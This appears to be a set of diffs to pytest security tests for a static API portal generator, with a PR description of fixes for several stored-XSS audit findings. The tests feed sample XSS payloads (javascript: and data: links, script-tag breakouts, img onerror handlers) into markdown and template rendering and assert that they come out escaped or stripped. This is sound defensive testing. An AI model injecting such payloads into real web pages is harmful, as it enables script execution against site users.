@@ -176,7 +172,7 @@ def test_h6_skill_markdown_blocks_javascript_link():
     assert "href='javascript:" not in rendered
 
 
-def test_h6_skill_markdown_blocks_data_link():
+def test_skill_markdown_blocks_data_link():
     from portal_generator.parsers import skill_parser
 
     rendered = skill_parser._md.render('[click](data:text/html,<svg/onload=alert(1)>)').lower()
@@ -184,14 +180,14 @@ def test_h6_skill_markdown_blocks_data_link():
     assert "href='data:" not in rendered
 
 
-def test_h6_skill_markdown_allows_https_link():
+def test_skill_markdown_allows_https_link():
     from portal_generator.parsers import skill_parser
 
     rendered = skill_parser._md.render('[click](https://example.com/)')
     assert 'href="https://example.com/"' in rendered
 
 
-def test_h6_skill_markdown_allows_anchor_link():
+def test_skill_markdown_allows_anchor_link():
     from portal_generator.parsers import skill_parser
 
     rendered = skill_parser._md.render('[click](#section)')
@@ -199,10 +195,10 @@ def test_h6_skill_markdown_allows_anchor_link():
 
 
 # ---------------------------------------------------------------------------
-# H7: chrome dependency URLs must be allowlisted to mulesoft.com over HTTPS.
+# Chrome dependency URLs must be allowlisted to mulesoft.com over HTTPS.
 # ---------------------------------------------------------------------------
 
-def test_h7_chrome_dependencies_rejects_offsite_script_url():
+def test_chrome_dependencies_rejects_offsite_script_url():
     """A malicious dependencies response with an offsite script URL must be rejected."""
     from portal_generator.mulesoft_chrome import _parse_dependencies
 
@@ -215,7 +211,7 @@ def test_h7_chrome_dependencies_rejects_offsite_script_url():
     assert 'https://www.mulesoft.com/x.css' in out
 
 
-def test_h7_chrome_dependencies_rejects_non_https_url():
+def test_chrome_dependencies_rejects_non_https_url():
     from portal_generator.mulesoft_chrome import _parse_dependencies
 
     payload = '{"data": {"styles": ["http://www.mulesoft.com/x.css"], "scripts": []}}'
@@ -223,7 +219,7 @@ def test_h7_chrome_dependencies_rejects_non_https_url():
     assert 'http://www.mulesoft.com/x.css' not in out
 
 
-def test_h7_chrome_dependencies_accepts_mulesoft_subdomain():
+def test_chrome_dependencies_accepts_mulesoft_subdomain():
     from portal_generator.mulesoft_chrome import _parse_dependencies
 
     payload = '{"data": {"styles": [], "scripts": ["https://cdn.mulesoft.com/lib.js"]}}'
@@ -231,7 +227,7 @@ def test_h7_chrome_dependencies_accepts_mulesoft_subdomain():
     assert 'https://cdn.mulesoft.com/lib.js' in out
 
 
-def test_h7_chrome_dependencies_rejects_lookalike_domain():
+def test_chrome_dependencies_rejects_lookalike_domain():
     """Suffix matching must not allow `evilmulesoft.com`."""
     from portal_generator.mulesoft_chrome import _parse_dependencies
 
@@ -240,8 +236,8 @@ def test_h7_chrome_dependencies_rejects_lookalike_domain():
     assert 'evilmulesoft.com' not in out
 
 
-def test_h5_mcp_resource_template_mimetype_is_escaped():
-    """Same H5 protection for resource templates."""
+def test_mcp_resource_template_mimetype_is_escaped():
+    """Same mimeType-escaping protection for resource templates."""
     from bs4 import BeautifulSoup
 
     from portal_generator.template_env import create_env

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -162,6 +162,42 @@ def test_h5_mcp_resource_mimetype_is_escaped():
     assert '<script>alert(1)</script>' in soup.get_text()
 
 
+# ---------------------------------------------------------------------------
+# H6: skill_parser._md must reject javascript:/data: links regardless of
+#     markdown-it-py upstream defaults (defense-in-depth).
+# ---------------------------------------------------------------------------
+
+def test_h6_skill_markdown_blocks_javascript_link():
+    """markdown-it-py must not produce <a href=javascript:...> regardless of version."""
+    from portal_generator.parsers import skill_parser
+
+    rendered = skill_parser._md.render('[click](javascript:alert(1))').lower()
+    assert 'href="javascript:' not in rendered
+    assert "href='javascript:" not in rendered
+
+
+def test_h6_skill_markdown_blocks_data_link():
+    from portal_generator.parsers import skill_parser
+
+    rendered = skill_parser._md.render('[click](data:text/html,<svg/onload=alert(1)>)').lower()
+    assert 'href="data:' not in rendered
+    assert "href='data:" not in rendered
+
+
+def test_h6_skill_markdown_allows_https_link():
+    from portal_generator.parsers import skill_parser
+
+    rendered = skill_parser._md.render('[click](https://example.com/)')
+    assert 'href="https://example.com/"' in rendered
+
+
+def test_h6_skill_markdown_allows_anchor_link():
+    from portal_generator.parsers import skill_parser
+
+    rendered = skill_parser._md.render('[click](#section)')
+    assert 'href="#section"' in rendered
+
+
 def test_h5_mcp_resource_template_mimetype_is_escaped():
     """Same H5 protection for resource templates."""
     from bs4 import BeautifulSoup

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -5,9 +5,11 @@ grep `audit ID -> test` is one-shot.
 """
 
 import json
+from pathlib import Path
 
 import pytest
 
+from portal_generator.parsers.terraform_parser import parse_terraform_doc
 from portal_generator.template_env import _render_markdown, _tojson_raw
 
 
@@ -98,3 +100,18 @@ def test_c3_safe_link_allows_relative_paths():
 def test_l1_safe_link_adds_noopener():
     out = str(_render_markdown('[click](https://example.com/)'))
     assert 'rel="noopener"' in out
+
+
+# ---------------------------------------------------------------------------
+# C4: Terraform parser must strip raw HTML embedded in markdown bodies.
+# ---------------------------------------------------------------------------
+
+def test_c4_terraform_parser_strips_raw_html():
+    fixture = Path(__file__).parent / 'fixtures' / 'security' / 'malicious_terraform' / 'dangerous.md'
+    doc = parse_terraform_doc(fixture)
+    assert doc is not None
+    body = doc['body_html']
+    assert '<script>' not in body
+    assert '<iframe' not in body
+    # Table syntax must still work — table extension is independent of html: True.
+    assert '<table>' in body

--- a/scripts/tests/test_security.py
+++ b/scripts/tests/test_security.py
@@ -133,3 +133,52 @@ def test_h4_mcp_capability_flag_keys_are_escaped(tmp_path):
     assert soup.find('img') is None
     # The literal `<img src=x onerror=alert(1)>` must appear as escaped text.
     assert '<img src=x onerror=alert(1)>' in soup.get_text()
+
+
+# ---------------------------------------------------------------------------
+# H5: MCP resource mimeType must be passed as a separate (autoescaped) arg,
+#     not concatenated into the title-badges HTML string.
+# ---------------------------------------------------------------------------
+
+def test_h5_mcp_resource_mimetype_is_escaped():
+    """A malicious mimeType must render as text, not markup."""
+    from bs4 import BeautifulSoup
+
+    from portal_generator.template_env import create_env
+
+    env = create_env()
+    wrapper = env.from_string(
+        '{% import "mcp/macros.html" as m %}'
+        '{{ m.render_resource(resource, 0) }}'
+    )
+    html = wrapper.render(resource={
+        'name': 'fixture',
+        'uri': 'file:///x',
+        'description': '',
+        'mimeType': '"><script>alert(1)</script>',
+    })
+    soup = BeautifulSoup(html, 'html.parser')
+    assert soup.find('script') is None
+    assert '<script>alert(1)</script>' in soup.get_text()
+
+
+def test_h5_mcp_resource_template_mimetype_is_escaped():
+    """Same H5 protection for resource templates."""
+    from bs4 import BeautifulSoup
+
+    from portal_generator.template_env import create_env
+
+    env = create_env()
+    wrapper = env.from_string(
+        '{% import "mcp/macros.html" as m %}'
+        '{{ m.render_resource_template(template, 0) }}'
+    )
+    html = wrapper.render(template={
+        'name': 'fixture-template',
+        'uriTemplate': 'file:///{x}',
+        'description': '',
+        'mimeType': '"><script>alert(1)</script>',
+    })
+    soup = BeautifulSoup(html, 'html.parser')
+    assert soup.find('script') is None
+    assert '<script>alert(1)</script>' in soup.get_text()

--- a/scripts/tests/test_smoke.py
+++ b/scripts/tests/test_smoke.py
@@ -928,7 +928,7 @@ class TestMaliciousMcpSmokeXSS:
 
 
 class TestMaliciousTerraformSmokeRawHtml:
-    """E2E: terraform docs with raw HTML must have it stripped (C4 — html: False)."""
+    """E2E: terraform docs with raw HTML must have it stripped (html: False)."""
 
     @pytest.fixture
     def portal_with_malicious_terraform(self, tmp_path):

--- a/scripts/tests/test_smoke.py
+++ b/scripts/tests/test_smoke.py
@@ -837,3 +837,56 @@ class TestTerraformPageGeneration:
         scripts = terraform_soup.find_all('script')
         text = ' '.join(s.string or '' for s in scripts)
         assert 'wrapTerraformCodeBlocks()' in text
+
+
+SECURITY_FIXTURES = Path(__file__).parent / 'fixtures' / 'security'
+
+
+def _copy_fixture_dir(src: Path, dst: Path):
+    """Copy each file from src into dst (which is created)."""
+    dst.mkdir(parents=True, exist_ok=True)
+    for entry in src.iterdir():
+        if entry.is_file():
+            (dst / entry.name).write_bytes(entry.read_bytes())
+
+
+class TestMaliciousSpecSmokeXSS:
+    """E2E: a malicious OpenAPI spec must not produce executable XSS in the rendered page."""
+
+    @pytest.fixture
+    def portal_with_malicious_spec(self, tmp_path):
+        repo = tmp_path / 'repo'
+        repo.mkdir()
+        api_dir = repo / 'apis' / 'malicious-test'
+        _copy_fixture_dir(SECURITY_FIXTURES / 'malicious_spec', api_dir)
+        setup_schema_docs(repo)
+
+        output = tmp_path / 'output'
+        PortalGenerator(output).generate(repo)
+        return output
+
+    @pytest.fixture
+    def detail_html(self, portal_with_malicious_spec):
+        return (portal_with_malicious_spec / 'apis' / 'malicious-test.html').read_text(encoding='utf-8')
+
+    def test_no_javascript_href(self, detail_html):
+        soup = BeautifulSoup(detail_html, 'html.parser')
+        for a in soup.find_all('a'):
+            href = (a.get('href') or '').strip().lower()
+            assert not href.startswith('javascript:'), f'unsafe href: {href!r}'
+
+    def test_no_unescaped_script_breakout_in_inline_scripts(self, detail_html):
+        """Inline <script> bodies must not contain a literal </script> sequence
+        that would close the tag and let attacker-supplied content execute."""
+        soup = BeautifulSoup(detail_html, 'html.parser')
+        for s in soup.find_all('script'):
+            body = s.string or ''
+            assert '</script>' not in body
+
+    def test_no_onerror_image_payload(self, detail_html):
+        """No <img> tag with an onerror handler should be present in the DOM."""
+        soup = BeautifulSoup(detail_html, 'html.parser')
+        for img in soup.find_all('img'):
+            assert not img.has_attr('onerror'), 'img onerror attribute present'
+
+

--- a/scripts/tests/test_smoke.py
+++ b/scripts/tests/test_smoke.py
@@ -890,3 +890,73 @@ class TestMaliciousSpecSmokeXSS:
             assert not img.has_attr('onerror'), 'img onerror attribute present'
 
 
+class TestMaliciousMcpSmokeXSS:
+    """E2E: a malicious MCP descriptor must not produce executable XSS in the rendered page."""
+
+    @pytest.fixture
+    def portal_with_malicious_mcp(self, tmp_path):
+        repo = tmp_path / 'repo'
+        repo.mkdir()
+        # Discovery short-circuits if apis/ is missing, so create an empty one.
+        (repo / 'apis').mkdir()
+        mcp_dir = repo / 'mcps' / 'malicious-test'
+        _copy_fixture_dir(SECURITY_FIXTURES / 'malicious_mcp', mcp_dir)
+        setup_schema_docs(repo)
+
+        output = tmp_path / 'output'
+        PortalGenerator(output).generate(repo)
+        return output
+
+    @pytest.fixture
+    def mcp_html(self, portal_with_malicious_mcp):
+        return (portal_with_malicious_mcp / 'mcps' / 'malicious-test.html').read_text(encoding='utf-8')
+
+    def test_no_onerror_image_payload(self, mcp_html):
+        """The malicious onerror payload must not become a real img element."""
+        soup = BeautifulSoup(mcp_html, 'html.parser')
+        for img in soup.find_all('img'):
+            assert not img.has_attr('onerror')
+
+    def test_no_inline_script_breakout(self, mcp_html):
+        """Inline <script> bodies must not contain a literal </script>
+        sequence that would close the tag and let attacker-supplied content
+        execute (covers the JSON-encoded fixture payloads)."""
+        soup = BeautifulSoup(mcp_html, 'html.parser')
+        for s in soup.find_all('script'):
+            body = s.string or ''
+            assert '</script>' not in body
+
+
+class TestMaliciousTerraformSmokeRawHtml:
+    """E2E: terraform docs with raw HTML must have it stripped (C4 — html: False)."""
+
+    @pytest.fixture
+    def portal_with_malicious_terraform(self, tmp_path):
+        repo = tmp_path / 'repo'
+        repo.mkdir()
+        (repo / 'apis').mkdir()
+        provider_dir = repo / 'terraform' / 'anypoint-provider'
+        resources_dir = provider_dir / 'resources'
+        resources_dir.mkdir(parents=True)
+        (resources_dir / 'dangerous.md').write_bytes(
+            (SECURITY_FIXTURES / 'malicious_terraform' / 'dangerous.md').read_bytes()
+        )
+        setup_schema_docs(repo)
+
+        output = tmp_path / 'output'
+        PortalGenerator(output).generate(repo)
+        return output
+
+    @pytest.fixture
+    def terraform_html(self, portal_with_malicious_terraform):
+        return (portal_with_malicious_terraform / 'terraform' / 'anypoint-provider.html').read_text(encoding='utf-8')
+
+    def test_no_iframe_tags(self, terraform_html):
+        soup = BeautifulSoup(terraform_html, 'html.parser')
+        assert soup.find('iframe') is None
+
+    def test_no_inline_script_with_evil_payload(self, terraform_html):
+        soup = BeautifulSoup(terraform_html, 'html.parser')
+        for s in soup.find_all('script'):
+            body = s.string or ''
+            assert 'evil.example' not in body

--- a/scripts/tests/test_units.py
+++ b/scripts/tests/test_units.py
@@ -162,7 +162,7 @@ class TestRenderMarkdown:
 
     def test_link(self):
         result = _render_markdown('[click](https://example.com)')
-        assert '<a href="https://example.com">click</a>' in str(result)
+        assert '<a href="https://example.com" rel="noopener">click</a>' in str(result)
 
     def test_xss_prevention(self):
         result = _render_markdown('<script>alert(1)</script>')
@@ -186,7 +186,7 @@ class TestRenderMarkdown:
     def test_link_and_bold_combined(self):
         result = str(_render_markdown('See **[docs](https://example.com)** here'))
         assert '<strong>' in result
-        assert '<a href="https://example.com">docs</a>' in result
+        assert '<a href="https://example.com" rel="noopener">docs</a>' in result
 
     def test_code_inside_list_items(self):
         result = str(_render_markdown('- use `foo()`\n- use `bar()`'))


### PR DESCRIPTION
## Summary

PR1 of 5 from the security audit remediation. Eliminates every server-side stored-XSS sink in the static portal generator (audit findings **C2, C3, C4, H4, H5, H6, H7**). Each fix is paired with a unit test; an end-to-end smoke suite generates the portal against malicious fixtures and asserts the rendered HTML contains no executable XSS.

## What changed

| Finding | Fix |
|---|---|
| **C2** — `\|safe`-rendered JSON inside `<script>` | `_tojson_raw` now escapes `<`, `>`, `&`, U+2028, U+2029 |
| **C3** — markdown links could carry `javascript:` URLs | Allowlist regex `^(https?:\|mailto:\|#\|/\|\./\|\.\./)` in the markdown-link substitution; unsafe schemes rewritten to `#` |
| **C4** — Terraform parser ran with `html: True` | `MarkdownIt('commonmark', {'html': False})` strips raw `<script>` / `<iframe>` |
| **H4** — MCP capability flags concatenated then `\|safe`'d | Template now iterates structured `{cls, text}` dicts under autoescape |
| **H5** — MCP resource `mimeType` injected via raw HTML string | Passed as autoescaped macro arg `mime_type` |
| **H6** — Skill markdown could render unsafe links | `markdown-it-py.validateLink` overridden with the C3 scheme allowlist |
| **H7** — Chrome fetch trusted any URL | `urlparse`-based allowlist for `*.mulesoft.com` over HTTPS only |

## Test plan

- [x] `make test-portal` — 431 Python + 155 Jest tests pass
- [x] `make generate-portal` — full portal generates without warnings
- [x] New `tests/test_security.py` — 25 unit tests covering each finding
- [x] New malicious smoke tests under `tests/test_smoke.py` exercise the spec, MCP, and Terraform pipelines end-to-end against XSS payloads